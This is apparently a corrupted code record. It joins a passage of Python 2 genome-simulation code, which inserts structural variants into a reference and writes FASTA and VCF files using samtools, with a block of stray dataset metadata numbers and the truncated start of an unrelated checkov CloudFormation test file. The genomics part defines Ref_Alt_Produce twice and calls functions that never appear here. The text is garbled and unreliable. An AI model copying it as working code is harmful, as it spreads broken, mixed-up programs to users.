if not '^' in temp[i] and not '^' in temp[i+1] and ord(temp[i+1])-ord(temp[i])==1:
temp2[-1]+=temp[i+1]
elif '^' in temp[i] and '^' in temp[i+1] and ord(temp[i+1][0])-ord(temp[i][0])==-1:
temp2[-1]=temp[i+1][0]+temp2[-1]
else:
temp2.append(temp[i+1])
outdel=[]
outinv=[]
outdup=[]
outtra=0
for i in range(len(temp2)):
j=temp2[i]
if '^' in j:
if not j.replace('^','') in outinv:
outinv.append(j.replace('^',''))
temp2[i]=j.replace('^','')
temp3=''.join(temp2)
for i in range(len(temp3)-1):
if ord(temp3[i+1])-ord(temp3[i])<0:
outtra=1
if not temp3==k1:
temp4=[]
for i in temp3:
if temp3.count(i)>1:
if not i in outdup:
outdup.append(i)
if not i in temp4:
temp4.append(i)
if not ''.join(temp4)==k1:
for i in k1:
if not i in temp4:
outdel.append(i)
if not outdup==[]:
dupuni=unit_produce(outdup)
outdup2=[]
k3=k2
for i in dupuni:
ia=i
ib=''.join([j+'^' for j in i[::-1]])
if len(i)>1:
if temp2.count(ia)+temp2.count(ib)>1:
outdup2.append([i,temp2.count(ia)+temp2.count(ib)])
k3=k3.replace(ia,'')
k3=k3.replace(ib,'')
elif len(i)==1:
if k3.count(ia)+k3.count(ib)>1:
outdup2.append([i,k3.count(ia)])
k3=k3.replace(ia,'')
k3=k3.replace(ib,'')
else:
outdup2=[]
return [outdel,outinv,outdup2,outtra]
def add_csv_info(csv1,flag_sex,k1,k2):
#flag_sex=1: Maternal
#flag_sex=2: Paternal
if flag_sex==1:
del_let=[csv1[0],[]]
inv_let=[csv1[1],[]]
dup_let=[csv1[2],[]]
else:
del_let=[[],csv1[0]]
inv_let=[[],csv1[1]]
dup_let=[[],csv1[2]]
for k3 in sv_info[k1][k2]:
del_info_add(k3,del_let)
inv_info_add(k3,inv_let)
dup_info_2_add(k3,dup_let)
if csv1[3]==1:
tra_info_add(k1,k2)
def del_info_add(k3,del_let):
tempa=bp_to_hash(k3[:-1],del_let[0])
tempb=bp_to_hash(k3[:-1],del_let[1])
for k1 in tempa:
if k1 in tempb:
tempc='hom'
tempb.remove(k1)
else:
tempc='heta'
if not k1[0] in del1.keys():
del1[k1[0]]=[]
del1[k1[0]].append(k1[1:]+[tempc,k3[-1],'_'.join(k3[:-1])])
for k1 in tempb:
if not k1[0] in del1.keys():
del1[k1[0]]=[]
del1[k1[0]].append(k1[1:]+['hetb',k3[-1],'_'.join(k3[:-1])])
def dup_info_add(k3,dup_let):
#dup_let=[k2i,k2j]
for k2x in dup_let:
for k4 in k2x:
temp=bp_to_hash(k3[:-1],[i for i in k4])
for k5 in temp:
if not k5[0] in dup1.keys():
dup1[k5[0]]=[]
dup1[k5[0]].append(k5[1:]+[k3[-1],'_'.join(k3[:-1]),k2a.count(k4)])
def dup_info_2_add(k3,dup_let):
temprec=-1
for k2x in dup_let:
temprec+=1
hetx=['heta','hetb'][temprec]
for k4 in k2x:
temp=bp_to_hash(k3[:-1],[i for i in k4[0]])
for k5 in temp:
if not k5[0] in dup1.keys():
dup1[k5[0]]=[]
if k4[1]>1:
dup1[k5[0]].append(k5[1:]+[hetx,k3[-1],'_'.join(k3[:-1]),k4[1]])
def inv_info_add(k3,inv_let):
#inv_let=[k2m,k2n]
temprec=-1
for k2x in inv_let:
temprec+=1
hetx=['heta','hetb'][temprec]
for k4 in k2x:
temp=bp_to_hash(k3[:-1],[i for i in k4])
for k5 in temp:
if not k5[0] in inv1.keys():
inv1[k5[0]]=[]
inv1[k5[0]].append(k5[1:]+[hetx,k3[-1],'_'.join(k3[:-1])])
def let_reclust(vec_in):
if vec_in==[]:
return []
else:
k2e=[]
k2e=[vec_in[0]]
for k3 in range(len(vec_in)-1):
if '^' in vec_in[k3+1]:
if '^' in vec_in[k3] and ord(vec_in[k3][0])-ord(vec_in[k3+1][0])==1:
k2e[-1]+=vec_in[k3+1]
else:
k2e.append(vec_in[k3+1])
else:
if ord(vec_in[k3+1][0])-ord(vec_in[k3][0])==1 and not '^' in vec_in[k3]:
k2e[-1]+=vec_in[k3+1]
else:
k2e.append(vec_in[k3+1])
k2f=[]
for k3 in k2e:
if '^' in k3:
k5=''
for k4 in range(len(k3)/2):
k5+=k3[2*k4]
k6=k5[::-1]+'^'
if not k6 in k2f:
k2f.append(k6)
else:
k2f.append(k3)
return k2f
def dup_let_recombind(vec_in):
if vec_in==[]:
return []
else:
vec2=sorted(vec_in)
vec=[[vec2[0]]]
for ka in vec2[1:]:
if ord(ka)-ord(vec[-1][-1])==1:
vec[-1].append(ka)
else:
vec.append([ka])
vec3=[]
for ka in vec:
if len(ka)==1:
vec3.append(ka)
else:
for kb in range(2,len(ka)+1):
for kc in ka[:(1-kb)]:
vec3.append([])
for kd in range(kb):
vec3[-1].append(ka[ka.index(kc)+kd])
vec4=[''.join(i) for i in vec3]
return vec4
def comp_info_reorganize(k1,k2):
del_let=[[],[]]
dup_let=[[],[]]
inv_let=[[],[]]
tra_let=[[],[]]
k2a=k2.split('/')[0]
k2b=k2.split('/')[1]
k2c=[]
k2d=[]
for k3 in k2a:
if not k3=='^':
k2c.append(k3)
else:
k2c[-1]+=k3
for k3 in k2b:
if not k3=='^':
k2d.append(k3)
else:
k2d[-1]+=k3
for k3 in k1.split('/')[0]:
if k2a.count(k3)==0:
del_let[0].append(k3)
if k2b.count(k3)==0:
del_let[1].append(k3)
if k2a.count(k3)>1:
dup_let[0].append(k3)
if k2b.count(k3)>1:
dup_let[1].append(k3)
k2e=let_reclust(k2c)
k2f=let_reclust(k2d)
k2g=dup_let_recombind(dup_let[0])
k2h=dup_let_recombind(dup_let[1])
k2i=[]
#integreated dup sections
k2j=[]
#integreated dup sections
for k3 in k2g:
flag1=0
for k4 in k2e:
if k3 in k4:
flag1+=1
if flag1>1:
k2i.append(k3)
for k3 in dup_let[0]:
if k2e.count(k3[0])+k2e.count(k3[0]+'^')>0:
if not k3[0] in k2i:
k2i.append(k3[0])
for k3 in k2h:
flag1=0
for k4 in k2e:
if k3 in k4:
flag1+=1
if flag1>1:
k2j.append(k3)
for k3 in dup_let[1]:
if k2e.count(k3[0])+k2e.count(k3[0]+'^')>0:
if not k3[0] in k2j:
k2j.append(k3[0])
k2m=[]
for k3 in k2e:
if k3[-1]=='^':
k2m.append(k3)
k2n=[]
for k3 in k2f:
if k3[-1]=='^':
k2n.append(k3)
for k3 in sv_info[k1][k2]:
del_info_add(k3,del_let)
dup_info_add(k3,[k2i,k2j])
inv_info_add(k3,[k2m,k2n])
def bp_to_hash(bp_list,sv_let):
bp_hash={}
block_rec=0
block_hash=[]
sv_let=[i[0] for i in sv_let]
for a3 in bp_list:
if a3 in chromos or not a3.isdigit():
block_hash.append([a3])
else:
block_hash[-1].append(a3)
for a3 in block_hash:
for a4 in range(len(a3)-2):
bp_hash[chr(97+block_rec)]=[a3[0],a3[a4+1],a3[a4+2]]
block_rec+=1
out=[]
if not sv_let==[]:
if len(sv_let)==1:
out=[bp_hash[sv_let[0]]]
else:
out.append(bp_hash[sv_let[0]])
for ka in range(len(sv_let)-1):
if ord(sv_let[ka+1])-ord(sv_let[ka])==1 and bp_hash[sv_let[ka+1]][0]==bp_hash[sv_let[ka]][0]:
out[-1]+=bp_hash[sv_let[ka+1]][1:]
else:
out.append(bp_hash[sv_let[ka+1]])
out2=[]
for ka in out:
out2.append([ka[0],int(ka[1]),int(ka[-1])])
return out2
def sv_homo_initial():
sv_homo_info['DEL']=[]
sv_homo_info['DUP']=[]
sv_homo_info['INV']=[]
sv_homo_info['TRA']=[]
def produce_keys(key):
if key=='DEL':
ka='a/a'
kb='/'
elif key=='DUP':
ka='a/a'
dup_num=random.sample(range(2,20),1)
kb='/'.join([''.join(['a' for i in range(dup_num[0])]),''.join(['a' for i in range(dup_num[0])])])
elif key=='INV':
ka='a/a'
kb='a^/a^'
elif key=='TRA':
ka='ab/ab'
kb='ba/ba'
return [ka,kb]
def sv_homo_produce():
for k1 in SV_region:
sv_len=k1[2]-k1[1]
k2=k1[-1]
sv_homo_info[k2].append(k1+produce_keys(k2))
def sv_het_produce():
for k1 in sv_homo_info.keys():
sv_het_info[k1]=[]
for k2 in sv_homo_info[k1]:
allele=random.choice(range(2))
alle_poor=[k2[-2].split('/')[0],k2[-1].split('/')[0]]
k2[-1]='/'.join([alle_poor[allele],alle_poor[1-allele]])
sv_het_info[k1].append(k2)
def sv_rec_homo_produce():
for k1 in sv_homo_info.keys():
fo=open(dict_opts['--output-prefix']+'.homo.'+k1+'.rec','w')
print dict_opts['--output-prefix']+'.homo.'+k1+'.rec'
for k2 in sv_homo_info[k1]:
print >>fo, ' '.join([str(i) for i in k2])
fo.close()
def sv_rec_het_produce():
for k1 in sv_het_info.keys():
fo=open(dict_opts['--output-prefix']+'.het.'+k1+'.rec','w')
print dict_opts['--output-prefix']+'.het.'+k1+'.rec'
for k2 in sv_het_info[k1]:
print >>fo, ' '.join([str(i) for i in k2])
fo.close()
def sv_info_rewrite(sv_h_info):
for k1 in sv_h_info.keys():
for k2 in sv_h_info[k1]:
if not k2[-2] in sv_info.keys():
sv_info[k2[-2]]={}
if not k2[-1] in sv_info[k2[-2]].keys():
sv_info[k2[-2]][k2[-1]]=[]
sv_info[k2[-2]][k2[-1]].append([str(i) for i in k2[:-3]]+[0.0])
def sv_stat_calcu(sv_hash,key):
out=[]
for k1 in sv_hash[key]:
sv_min=int(k1[1])
sv_max=int(k1[2])
sv_int=(int(k1[2])-int(k1[1]))/3
out.append([k1[0],sv_min,sv_min+sv_int, sv_max-sv_int,sv_max])
return out
def sv_size_pick(sv_stat):
out=[]
for k1 in sv_stat:
out+=[random.choice(range(int(k1[1]),int(k1[2]))) for i in range(int(k1[0]/3))]
out+=[random.choice(range(int(k1[2]),int(k1[3]))) for i in range(int(int(k1[0])-int(k1[0]/3))/2)]
out+=[random.choice(range(int(k1[3]),int(k1[4]))) for i in range(int(k1[0])-int(k1[0]/3)-int(int(k1[0])-int(k1[0]/3))/2)]
permute=random.sample(out,len(out))
return out
def chromos_readin(refs):
fin=open(refs+'.fai')
chromos=[]
chromo_length=[]
genome_length=0
for line in fin:
pin=line.strip().split()
chromos.append(pin[0])
genome_length+=int(pin[1])
chromo_length.append(int(pin[1]))
fin.close()
chromo_num_region=[]
for k1 in chromo_length:
chromo_num_region.append(int(round(float(k1)/float(genome_length)*sv_total_num)))
chrom_to_remove=[]
out_num_region=[]
out_chromos=[]
out_length={}
for i in range(len(chromo_num_region)):
if chromo_num_region[i]>1:
out_chromos.append(chromos[i])
out_num_region.append(chromo_num_region[i])
out_length[chromos[i]]=chromo_length[i]
return [genome_length]+[out_chromos]+[out_num_region]+[out_length]
def sv_hash_add(list_in,key):
for i in list_in:
if not i in sv_hash.keys():
sv_hash[i]=[key]
else:
sv_hash[i]+=[key]
def sv_region_pick():
#pick random regions across the genome
SV_region=[]
rec=-1
sv_size=del_size+dup_size+inv_size+tra_size
sv_size=random.sample(sv_size,len(sv_size))
for k1 in range(len(chromos)):
chromosome=chromos[k1]
num_region=chromo_num_region[k1]
range_region=chromo_length[chromosome]
temp_start_region=sorted(random.sample(range(1000, range_region-1000),num_region+1))
temp_end_region=[]
for k2 in range(num_region):
start=temp_start_region[k2]
start2=temp_start_region[k2+1]
if start2-start<1000: continue
rec+=1
temp_sv_size=sv_size[rec]
sv_type=sv_hash[sv_size[rec]][0]
del sv_hash[sv_size[rec]][0]
end=start+temp_sv_size
if not end<start2-300:
end=random.choice(range(start,int(numpy.mean([start,start2]))))
if sv_type=='TRA':
end2=random.choice(range(end+100,start2-100))
temp_end_region.append(end)
if sv_type=='TRA':
SV_region.append([chromos[k1],start,end,end2,sv_type])
else:
SV_region.append([chromos[k1],start,end,sv_type])
return SV_region
def ref_base_returnN(ref,chromo,pos):
return 'N'
def ref_base_readin(ref,chromo,pos):
fref=os.popen(r'''samtools faidx %s %s:%s-%s'''%(ref,chromo,str(pos),str(pos)))
tre=fref.readline().strip().split()
REF_AL=fref.readline().strip().split()
if not REF_AL==[]:
return REF_AL[0]
else:
return 'N'
def del_flag_SA(k1,k2):
out=0
if not '^' in k2:
flagdup=0
for i in k2:
if k2.count(i)>1:
flagdup+=1
if flagdup==0:
flagtra=0
for i in range(len(k2)-1):
if ord(k2[i+1])-ord(k2[i])<1:
flagtra+=1
if flagtra==0:
if not k1==k2:
out=1
return out
def order_SV_Homo_write(sv_info):
for k1 in sv_info.keys():
for k2 in sv_info[k1].keys():
for k3 in sv_info[k1][k2]:
if not k3[0] in order_SV_Pos.keys():
order_SV_Pos[k3[0]]={}
if not int(k3[1]) in order_SV_Pos[k3[0]].keys():
order_SV_Pos[k3[0]][int(k3[1])]=[]
order_SV_Pos[k3[0]][int(k3[1])].append([[k3[0]]+[int(i) for i in k3[1:-1]],[k2.split('/')[0]]])
def order_SV_Het_write(sv_info):
for k1 in sv_info.keys():
for k2 in sv_info[k1].keys():
for k3 in sv_info[k1][k2]:
if not k3[0] in order_SV_Pos.keys():
order_SV_Pos[k3[0]]={}
if not int(k3[1]) in order_SV_Pos[k3[0]].keys():
order_SV_Pos[k3[0]][int(k3[1])]=[]
order_SV_Pos[k3[0]][int(k3[1])].append([[k3[0]]+[int(i) for i in k3[1:-1]],[k2.split('/')[0],k2.split('/')[1],k1.split('/')[0]]])
def order_SV_Comp_write(sv_info):
fo=open(dict_opts['--output-prefix']+'.comp.CSV.rec','w')
rec=0
for k1 in sv_info.keys():
for k2 in sv_info[k1].keys():
for k3 in sv_info[k1][k2]:
rec+=1
print >>fo, ' '.join([str(i) for i in k3+[k1,k2]])
fo.close()
def Ref_Alt_Produce(ChromoList,bp_list,letter_new,Ref_Seq_File):
#Chromo=Chr, target chromosome
#BamN: DG187, DG196... name of sample
#eg of bp_list:[184569179, 184569775, 184571064, 184572009, 184572016]
#Eg of flank: flank : 446
if letter_new=='':
return ''
else:
bp_hash={}
bp_seq=[]
for k1 in bp_list:
if k1 in ChromoList:
bp_seq.append([k1])
else:
bp_seq[-1].append(k1)
rec=0
for k1 in bp_seq:
for k2 in range(len(k1)-2):
rec+=1
bp_hash[chr(96+rec)]=[k1[0],k1[k2+1],k1[k2+2]]
letter_seq={}
for k1 in bp_hash.keys():
Chromo=bp_hash[k1][0]
region_left=bp_hash[k1][1]
region_right=bp_hash[k1][2]
seq=os.popen(r'''samtools faidx %s %s:%d-%d'''%(Ref_Seq_File,Chromo,region_left,region_right))
seq.readline().strip().split()
lines=[]
while True:
line=seq.readline().strip().split()
if not line: break
lines.append(line)
Seq1=lines[0][0]
for j in range(len(lines))[1:]:
Seq1=''.join([Seq1,lines[j][0]])
letter_seq[k1]=Seq1
letter_seq[k1+'^']=reverse(complementary(Seq1))
new_Seq=''
new_letter=[]
for k1 in letter_new:
if not k1=='^':
new_letter.append(k1)
else:
new_letter[-1]+=k1
for k1 in new_letter:
new_Seq+=letter_seq[k1]
return new_Seq
def Ref_Ref_Produce(Chromo,bp_list,Ref_Seq_File):
start=int(bp_list[0])
end=int(bp_list[-1])
new1_ref=''
fin=os.popen(r'''samtools faidx %s %s:%d-%d'''%(Ref_Seq_File, Chromo, start,end))
fin.readline().strip().split()
for line in fin:
pin=line.strip().split()
new1_ref+=pin[0]
fin.close()
return new1_ref
def reverse(seq):
seq2=[]
for i in seq[::-1]:
seq2.append(i)
return ''.join(seq2)
def complementary(seq):
seq2=[]
for i in seq:
if i in 'ATGCN':
seq2.append('ATGCN'['TACGN'.index(i)])
elif i in 'atgcn':
seq2.append('atgcn'['tacgn'.index(i)])
return ''.join(seq2)
def unit_produce(list):
temp1=[sorted(list)[0]]
for k1 in sorted(list)[1:]:
if ord(k1)-ord(temp1[-1][-1])==1:
temp1[-1]+=k1
else:
temp1.append(k1)
temp2=[]
for k1 in temp1:
for k2 in range(len(k1)+1)[1:]:
for k3 in range(len(k1)-k2+1):
temp2.append(k1[k3:(k3+k2)])
return temp2[::-1]
def fasta_homo_write(fasta_out):
fo=open(fasta_out,'w')
print fasta_out
for k1 in chromos:
print >>fo, '>'+k1
new1_ref=''
rec1_start=0
for k2 in sorted(order_SV_Pos[k1].keys()):
rec1_start+=1
k3=order_SV_Pos[k1][k2]
start=int(k3[0][0][1])
end=int(k3[0][0][-1])
new1_ref+=Ref_Ref_Produce(k1,[rec1_start,start-1],ref)
new1_ref+=Ref_Alt_Produce(chromos,k3[0][0],k3[0][1][0],ref)
rec1_start=end
rec1_start+=1
new1_ref+=Ref_Ref_Produce(k1,[rec1_start,chromo_length[k1]],ref)
new1_seq=[]
for k1 in range(len(new1_ref)/60):
new1_seq.append(new1_ref[k1*60:(k1+1)*60])
new1_seq.append(new1_ref[(k1+1)*60:])
for k1 in new1_seq:
if not k1=='':
print >>fo, k1
fo.close()
def fasta_het_write_a(fasta_out):
fo1=open(fasta_out.replace('.het.fa','.het1.fa'),'w')
#fo2=open(fasta_out.replace('.het.fa','.het2.fa'),'w')
fo1.close()
#fo2.close()
print fasta_out.replace('.het.fa','.het1.fa')
#print fasta_out.replace('.het.fa','.het2.fa')
for k1 in chromos:
fo1=open(fasta_out.replace('.het.fa','.het1.fa'),'a')
#fo2=open(fasta_out.replace('.het.fa','.het2.fa'),'a')
print >>fo1, '>'+k1
#print >>fo2, '>'+k1
new1_ref=''
rec1_start=0
#new2_ref=''
#rec2_start=0
for k2 in sorted(order_SV_Pos[k1].keys()):
print [k1,k2]
rec1_start+=1
k3=order_SV_Pos[k1][k2]
start=int(k3[0][0][1])
end=int(k3[0][0][-1])
new1_ref+=Ref_Ref_Produce(k1,[rec1_start,start-1],ref)
if not k3[0][1][0]==k3[0][1][2]:
new1_ref+=Ref_Alt_Produce(chromos,k3[0][0],k3[0][1][0],ref)
else:
new1_ref+=Ref_Ref_Produce(k1,[start,end],ref)
rec1_start=end
#rec2_start+=1
#new2_ref+=Ref_Ref_Produce(k1,[rec2_start,start-1],ref)
#if not k3[0][1][1]==k3[0][1][2]:
# new2_ref+=Ref_Alt_Produce(chromos,k3[0][0],k3[0][1][1],ref)
#else:
# new2_ref+=Ref_Ref_Produce(k1,[start,end],ref)
#rec2_start=end
rec1_start+=1
#rec2_start+=1
new1_ref+=Ref_Ref_Produce(k1,[rec1_start,chromo_length[k1]],ref)
new1_seq=[]
for ka1 in range(len(new1_ref)/60):
new1_seq.append(new1_ref[ka1*60:(ka1+1)*60])
new1_seq.append(new1_ref[(ka1+1)*60:])
for ka1 in new1_seq:
if not ka1=='':
print >>fo1, ka1
#new2_ref+=Ref_Ref_Produce(k1,[rec2_start,chromo_length[k1]],ref)
#new2_seq=[]
#for ka1 in range(len(new2_ref)/60):
# new2_seq.append(new2_ref[ka1*60:(ka1+1)*60])
#new2_seq.append(new2_ref[(ka1+1)*60:])
#for ka1 in new2_seq:
# if not ka1=='':
# print >>fo2, ka1
fo1.close()
#fo2.close()
def fasta_het_write_b(fasta_out):
#fo1=open(fasta_out.replace('.het.fa','.het1.fa'),'w')
fo2=open(fasta_out.replace('.het.fa','.het2.fa'),'w')
#fo1.close()
fo2.close()
#print fasta_out.replace('.het.fa','.het1.fa')
print fasta_out.replace('.het.fa','.het2.fa')
for k1 in chromos:
#fo1=open(fasta_out.replace('.het.fa','.het1.fa'),'a')
fo2=open(fasta_out.replace('.het.fa','.het2.fa'),'a')
#print >>fo1, '>'+k1
print >>fo2, '>'+k1
#new1_ref=''
#rec1_start=0
new2_ref=''
rec2_start=0
for k2 in sorted(order_SV_Pos[k1].keys()):
print [k1,k2]
k3=order_SV_Pos[k1][k2]
start=int(k3[0][0][1])
end=int(k3[0][0][-1])
#rec1_start+=1
#new1_ref+=Ref_Ref_Produce(k1,[rec1_start,start-1],ref)
#if not k3[0][1][0]==k3[0][1][2]:
# new1_ref+=Ref_Alt_Produce(chromos,k3[0][0],k3[0][1][0],ref)
#else:
# new1_ref+=Ref_Ref_Produce(k1,[start,end],ref)
#rec1_start=end
rec2_start+=1
new2_ref+=Ref_Ref_Produce(k1,[rec2_start,start-1],ref)
if not k3[0][1][1]==k3[0][1][2]:
new2_ref+=Ref_Alt_Produce(chromos,k3[0][0],k3[0][1][1],ref)
else:
new2_ref+=Ref_Ref_Produce(k1,[start,end],ref)
rec2_start=end
#rec1_start+=1
rec2_start+=1
#new1_ref+=Ref_Ref_Produce(k1,[rec1_start,chromo_length[k1]],ref)
#new1_seq=[]
#for ka1 in range(len(new1_ref)/60):
# new1_seq.append(new1_ref[ka1*60:(ka1+1)*60])
#new1_seq.append(new1_ref[(ka1+1)*60:])
#for ka1 in new1_seq:
# if not ka1=='':
# print >>fo1, ka1
new2_ref+=Ref_Ref_Produce(k1,[rec2_start,chromo_length[k1]],ref)
new2_seq=[]
for ka1 in range(len(new2_ref)/60):
new2_seq.append(new2_ref[ka1*60:(ka1+1)*60])
new2_seq.append(new2_ref[(ka1+1)*60:])
for ka1 in new2_seq:
if not ka1=='':
print >>fo2, ka1
#fo1.close()
fo2.close()
def Sample_info_ReadIn(Sam_File):
fi=open(Sam_File)
for line in fi:
pin=line.strip().split()
if not pin==[]:
if not pin[0] in sv_hash.keys():
sv_hash[pin[0]]=[]
sv_hash[pin[0]].append([int(i) for i in pin[1:]])
sv_hash[pin[0]][-1][0]=int(sv_hash[pin[0]][-1][0]*1.25)
else:
sv_hash[pin[0]].append([int(i) for i in pin[1:]])
sv_hash[pin[0]][-1][0]=int(sv_hash[pin[0]][-1][0]*1.25)
fi.close()
def sv_total_num_calcu():
sv_total_num=0
for k1 in del_stat:
sv_total_num+=k1[0]
for k1 in dup_stat:
sv_total_num+=k1[0]
for k1 in inv_stat:
sv_total_num+=k1[0]
for k1 in tra_stat:
sv_total_num+=k1[0]
return sv_total_num
def pick_random_seqs(ref,sv_total_num,chromo_length):
#12% of all SVs have micro insrts at both /either ends
#double number of seqs would be randomly picked from genome as long micro-insertions
num_micro_ins_over20bp=float(sv_total_num)*0.12*2
genome_length=0
chromos_num_regions={}
chrom_seqs={}
for x in chromo_length.keys():
if not 'GL' in x and not x in ['X','Y','MT']:
genome_length+=chromo_length[x]
for x in chromo_length.keys():
if not 'GL' in x and not x in ['X','Y','MT']:
chromos_num_regions[x]=float(chromo_length[x])/float(genome_length)*num_micro_ins_over20bp
for x in chromos_num_regions.keys():
chrom_seqs[x]=[]
int_num=int(round(chromos_num_regions[x]))
seq_pick=random.sample(range(10000,chromo_length[x]-10000),int_num)
for y in sorted(seq_pick):
length_pick=random.sample(range(20,50),1)[0]
seqs=os.popen(r'''samtools faidx %s %s:%d-%d'''%(ref,x,y,y+length_pick))
seqs.readline()
test=seqs.readline().strip()
if not 'NNNNNNNN' in test:
chrom_seqs[x].append(test)
seqs.close()
return chrom_seqs
def produce_random_seqs(length):
out=[]
for x in range(length):
out.append(random.choice(['A','T','G','C']))
return ''.join(out)
def Ref_Alt_Produce(ChromoList,bp_list,letter_new,Ref_Seq_File):
#Chromo=Chr, target chromosome
#BamN: DG187, DG196... name of sample
#eg of bp_list:[184569179, 184569775, 184571064, 184572009, 184572016]
#Eg of flank: flank : 446
if letter_new=='':
return insert_read_decide(bp_list)
else:
bp_hash={}
bp_seq=[]
for k1 in bp_list:
if k1 in ChromoList:
bp_seq.append([k1])
else:
bp_seq[-1].append(k1)
rec=0
for k1 in bp_seq:
for k2 in range(len(k1)-2):
rec+=1
bp_hash[chr(96+rec)]=[k1[0],k1[k2+1],k1[k2+2]]
letter_seq={}
for k1 in bp_hash.keys():
Chromo=bp_hash[k1][0]
region_left=bp_hash[k1][1]
region_right=bp_hash[k1][2]
seq=os.popen(r'''samtools faidx %s %s:%d-%d'''%(Ref_Seq_File,Chromo,region_left,region_right))
seq.readline().strip().split()
lines=[]
while True:
line=seq.readline().strip().split()
if not line: break
lines.append(line)
Seq1=lines[0][0]
if len(lines)>1:
for j in range(len(lines))[1:]:
if not lines[j]==[]:
Seq1=''.join([Seq1,lines[j][0]])
letter_seq[k1]=Seq1
letter_seq[k1+'^']=reverse(complementary(Seq1))
new_Seq=''
new_letter=[]
for k1 in letter_new:
if not k1=='^':
new_letter.append(k1)
else:
new_letter[-1]+=k1
for k1 in new_letter:
new_Seq+=letter_seq[k1]
new_Seq+=insert_read_decide(bp_list)
return new_Seq
opts,args=getopt.getopt(sys.argv[2:],'',['reference=','input-sim=','input-rec=','output-prefix='])
dict_opts=dict(opts)
refs=dict_opts['--reference']
ref=refs
score_Cff=-20
Sam_File=dict_opts['--input-sim']
sv_hash={}
Sample_info_ReadIn(Sam_File)
sv_stat=sv_stat_calcu(sv_hash,'DEL')
sv_size=sv_size_pick(sv_stat)
sv_total_num=sum([i[0] for i in sv_hash[sv_hash.keys()[0]]])
chromos_TOTAL=chromos_readin(refs)
genome_length=chromos_TOTAL[0]
chromos=chromos_TOTAL[1]
chromo_num_region=chromos_TOTAL[2]
chromo_length=chromos_TOTAL[3]
csv_hash={}
fin=open(dict_opts['--input-rec'])
csv1_hash={}
csv2_hash={}
for line in fin:
pin=line.strip().split()
if not pin[0] in csv_hash.keys():
csv_hash[pin[0]]=[]
if not pin[1] in csv_hash[pin[0]]:
csv_hash[pin[0]].append(pin[1])
if not pin[0] in csv1_hash.keys():
csv1_hash[pin[0]]=0
csv1_hash[pin[0]]+=int(pin[-1])
if not pin[1] in csv2_hash.keys():
csv2_hash[pin[1]]=0
csv2_hash[pin[1]]+=int(pin[-1])
fin.close()
csv1_keys=[]
for i in csv_hash.keys():
csv1_keys+=[i for j in range(csv1_hash[i])]
csv1_csv2_hash={}
for k1 in csv_hash.keys():
csv1_csv2_hash[k1]=[]
for k2 in csv_hash[k1]:
csv1_csv2_hash[k1]+=[k2 for j in range(csv2_hash[k2])]
overlap_hash={}
SV_region=csv_region_pick(sv_size)
ordered_sv_info=csv_rec_write(SV_region)
sv_info=csv_info_rewrite(SV_region)
del1={}
dup1={}
inv1={}
tra1={}
for k1ab in sorted(sv_info.keys()):
for k2ab in sv_info[k1ab].keys():
if not k2ab==k1ab:
tra_info_add(k1ab,k2ab)
sv_out={}
hash_reorder()
vcf_out=dict_opts['--output-prefix']+'.vcf'
write_VCF_header(vcf_out)
write_VCF_main(vcf_out)
fasta_out=dict_opts['--output-prefix']+'.comp.fa'
#produce fasta file containing all sv file for homo svs
order_SV_Pos={}
order_SV_Comp_write(sv_info)
order_SV_Het_write(sv_info)
seq_ins_pools=pick_random_seqs(ref,sv_total_num,chromo_length)
fasta_comp_write_a(fasta_out)
fasta_comp_write_b(fasta_out)
os.system(r'''samtools faidx %s'''%(fasta_out.replace('.comp.fa','.comp1.fa')))
os.system(r'''samtools faidx %s'''%(fasta_out.replace('.comp.fa','.comp2.fa')))
| 36.904358
| 336
| 0.550891
| 25,520
| 152,415
| 3.120572
| 0.021003
| 0.028253
| 0.014164
| 0.012883
| 0.950174
| 0.938986
| 0.928526
| 0.923578
| 0.920464
| 0.913796
| 0
| 0.074352
| 0.246846
| 152,415
| 4,129
| 337
| 36.913296
| 0.619399
| 0.053499
| 0
| 0.921173
| 0
| 0.009439
| 0.074958
| 0.027134
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.009184
| 0.003061
| null | null | 0.048724
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
54bdc659df861341b8f324d23add000b4c1c3b98
| 6,742
|
py
|
Python
|
tests/cloudformation/runner/test_runner.py
|
antonblr/checkov
|
9415c6593c537945c08f7a19f28bdd8b96966f67
|
[
"Apache-2.0"
] | 3
|
2021-04-19T17:17:21.000Z
|
2021-09-06T06:31:09.000Z
|
tests/cloudformation/runner/test_runner.py
|
antonblr/checkov
|
9415c6593c537945c08f7a19f28bdd8b96966f67
|
[
"Apache-2.0"
] | 16
|
2021-03-09T07:38:38.000Z
|
2021-06-09T03:53:55.000Z
|
tests/cloudformation/runner/test_runner.py
|
antonblr/checkov
|
9415c6593c537945c08f7a19f28bdd8b96966f67
|
[
"Apache-2.0"
] | 1
|
2021-03-07T07:23:39.000Z
|
2021-03-07T07:23:39.000Z
|
import os
import unittest
from checkov.cloudformation import cfn_utils
from checkov.cloudformation.parser import parse
from checkov.runner_filter import RunnerFilter
from checkov.cloudformation.runner import Runner
class TestRunnerValid(unittest.TestCase):
def test_record_relative_path_with_relative_dir(self):
# test whether the record's repo_file_path is correct, relative to the CWD (with a / at the start).
# this is just constructing the scan dir as normal
current_dir = os.path.dirname(os.path.realpath(__file__))
scan_dir_path = os.path.join(current_dir, "resources")
# this is the relative path to the directory to scan (what would actually get passed to the -d arg)
dir_rel_path = os.path.relpath(scan_dir_path)
runner = Runner()
checks_allowlist = ['CKV_AWS_20']
report = runner.run(root_folder=dir_rel_path, external_checks_dir=None,
runner_filter=RunnerFilter(framework='cloudformation', checks=checks_allowlist))
all_checks = report.failed_checks + report.passed_checks
self.assertTrue(len(all_checks) > 0) # ensure that the assertions below are going to do something
for record in all_checks:
# no need to join with a '/' because the CFN runner adds it to the start of the file path
self.assertEqual(record.repo_file_path, f'/{dir_rel_path}{record.file_path}')
def test_record_relative_path_with_abs_dir(self):
# test whether the record's repo_file_path is correct, relative to the CWD (with a / at the start).
# this is just constructing the scan dir as normal
current_dir = os.path.dirname(os.path.realpath(__file__))
scan_dir_path = os.path.join(current_dir, "resources")
dir_rel_path = os.path.relpath(scan_dir_path)
dir_abs_path = os.path.abspath(scan_dir_path)
runner = Runner()
checks_allowlist = ['CKV_AWS_20']
report = runner.run(root_folder=dir_abs_path, external_checks_dir=None,
runner_filter=RunnerFilter(framework='cloudformation', checks=checks_allowlist))
